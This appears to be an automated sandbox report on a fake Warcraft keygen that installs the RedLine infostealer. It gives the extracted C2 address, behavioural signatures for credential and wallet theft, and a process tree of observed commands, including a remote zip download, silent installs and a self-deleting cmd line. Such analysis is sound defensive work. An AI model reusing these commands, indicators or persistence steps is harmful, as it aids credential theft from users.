Analysis
-
max time kernel
1200s -
max time network
1202s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
24-10-2022 20:50
General
-
Target
-warcraft-tft-keygen-F82Z5I7.exe
-
Size
9.5MB
-
MD5
a959e89b1669d9657223e0708e60edca
-
SHA1
5e6113b81512f75f7138994a72e7d1152ebbab05
-
SHA256
fb3d286faee2cf6345988d4dd8c025688075e425a64c311439bed5d54461b0ab
-
SHA512
bb183aede190f9886d18ee002ffaae6e66e485a4f8d0123887e37b622c63685f35f7beda400ea4118770491e962a48d401e29e9ed64f584e30b02df367702aba
-
SSDEEP
196608:AW6aE7Lojzz2jXtfoZ08YKvF0n3mOr0ikl8UuYOOKDHoazb9keDC:OZ7Lszz2jX6ixKvF0n2Oo8wEDPkf
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
BirjNewAntibank2
C2
79.137.197.136:23532
Attributes
-
auth_value
a4e87a0b1505745bcd9e72d045f1ba5c
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
-
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 23 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies Control Panel 20 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 21 IoCs
-
Modifies system certificate store 2 TTPs 19 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\-warcraft-tft-keygen-F82Z5I7.exe"C:\Users\Admin\AppData\Local\Temp\-warcraft-tft-keygen-F82Z5I7.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-0TBQK.tmp\is-UM0VH.tmp"C:\Users\Admin\AppData\Local\Temp\is-0TBQK.tmp\is-UM0VH.tmp" /SL4 $801C6 "C:\Users\Admin\AppData\Local\Temp\-warcraft-tft-keygen-F82Z5I7.exe" 9672036 481282⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵
-
C:\Program Files (x86)\Syney\PCCleaner\PCCleaner.exe"C:\Program Files (x86)\Syney\PCCleaner\PCCleaner.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 8684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 9404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 8364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 1404⤵
- Program crash
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "PCCleaner 1"3⤵
-
C:\Program Files (x86)\Syney\PCCleaner\PCCleaner.exe"C:\Program Files (x86)\Syney\PCCleaner\PCCleaner.exe" 1df4967a8b55e0254e559fb7330da0363⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 8964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 9044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 9884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 10964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 11044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 11204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 11924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 13404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 13484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 8964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 10084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 15284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 12044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 15364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 13404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 17124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 19004⤵
- Program crash
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://totrakto.com/warcraft-3-tft-keygen-19.zip4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc1db546f8,0x7ffc1db54708,0x7ffc1db547185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4996 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x180,0x17c,0x168,0x154,0x164,0x7ff73b455460,0x7ff73b455470,0x7ff73b4554806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4052709010349848317,8990132547038142413,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:15⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 16004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 15764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 16404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 17804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 13444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 15004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 16164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 16204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 17924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 18244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 19804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 19924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20204⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Lb6pY3Op\Tfwkyr4mZm9Tlg8GKo8B.exeC:\Users\Admin\AppData\Local\Temp\Lb6pY3Op\Tfwkyr4mZm9Tlg8GKo8B.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\fLWUzBAt\82dJZIn1O80q7ub68tFI.exeC:\Users\Admin\AppData\Local\Temp\fLWUzBAt\82dJZIn1O80q7ub68tFI.exe /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-A89PH.tmp\82dJZIn1O80q7ub68tFI.tmp"C:\Users\Admin\AppData\Local\Temp\is-A89PH.tmp\82dJZIn1O80q7ub68tFI.tmp" /SL5="$40242,4822386,780800,C:\Users\Admin\AppData\Local\Temp\fLWUzBAt\82dJZIn1O80q7ub68tFI.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops startup file
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Proxy2Service\client.exe"C:\Program Files (x86)\Proxy2Service\client.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20124⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a3U5KqMn\6dXjBurXuE2A2HRzv4d.exeC:\Users\Admin\AppData\Local\Temp\a3U5KqMn\6dXjBurXuE2A2HRzv4d.exe /VERYSILENT4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\path55gta.exeC:\Users\Admin\AppData\Local\Temp\path55gta.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\gtaV5path.exeC:\Users\Admin\AppData\Local\Temp\gtaV5path.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\a3U5KqMn\6dXjBurXuE2A2HRzv4d.exe & exit5⤵
-
C:\Windows\system32\PING.EXEping 06⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\6N4e2ZUU\Veqib9DWAp2jG8JUN0.exeC:\Users\Admin\AppData\Local\Temp\6N4e2ZUU\Veqib9DWAp2jG8JUN0.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-DHQOG.tmp\is-3PQJM.tmp"C:\Users\Admin\AppData\Local\Temp\is-DHQOG.tmp\is-3PQJM.tmp" /SL4 $102B0 "C:\Users\Admin\AppData\Local\Temp\6N4e2ZUU\Veqib9DWAp2jG8JUN0.exe" 2475703 476165⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\HDNGURU LLF Tool\LLFTOOL.exe"C:\Program Files (x86)\HDNGURU LLF Tool\LLFTOOL.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 18124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 16564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 16564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 21084⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\IMBApL2G\c43rIfm3KgY4PiV.exeC:\Users\Admin\AppData\Local\Temp\IMBApL2G\c43rIfm3KgY4PiV.exe /sid=3 /pid=1464⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exeC:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\d0681b3f-0baf-45d1-bc92-7e21ffffb485.exe"C:\Users\Admin\AppData\Local\Temp\d0681b3f-0baf-45d1-bc92-7e21ffffb485.exe" /sid=3 /pid=1466⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exeC:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe8⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2920,11598328293229199253,10037162673382561336,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2948 /prefetch:29⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2920,11598328293229199253,10037162673382561336,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:19⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2844,2794337326330680871,3290147657243974060,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/106.0.1347.0" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 /prefetch:211⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2844,2794337326330680871,3290147657243974060,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/106.0.1347.0" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3172 /prefetch:811⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2844,2794337326330680871,3290147657243974060,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/106.0.1347.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:111⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2756,1678014076749500186,2742012632960583978,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/106.0.0.0" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2928 /prefetch:213⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2756,1678014076749500186,2742012632960583978,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/106.0.0.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:113⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies Control Panel
-
